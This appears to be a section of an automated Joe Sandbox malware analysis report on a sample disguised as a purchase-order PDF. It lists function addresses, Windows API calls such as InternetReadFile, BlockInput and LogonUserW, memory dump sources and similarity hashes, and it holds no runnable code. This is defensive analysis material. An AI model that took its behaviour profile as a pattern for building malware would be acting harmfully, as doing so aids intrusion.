                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 48322524-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                                                                                                                                                                                            • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                                                                                                                                                                                                            Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                            • String ID: rJ
                                                                                                                                                                                                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                                                                                                                                                                                                            • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                                                                                                                                                            • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                                                                                                                                                                                                            Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                            • String ID: rJ
                                                                                                                                                                                                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                                                                                                                                                                                                            • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                                                                                                                                                                                                            Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 901099227-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1efa27a708889211d571c3a51cb8a45fc10d59491133636c855e566be89f5e19
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1efa27a708889211d571c3a51cb8a45fc10d59491133636c855e566be89f5e19
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                                                                                                                                                                                                            Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                                                                                                                                                                                                            Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: 0vH$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 0-728391547
                                                                                                                                                                                                                                                                                                            • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                                                                                                                                                                                            • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                                                                                                                                                                                                            Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                                                                                                                                                                                            • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                                                                                                                                                                                                            Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Proc
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2346855178-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                                                                                                                                                            • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                                                                                                                                                                                                            Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                                                                                                                                                                                            Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LogonUser
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1244722697-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                                                                                                                                                                                                            Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
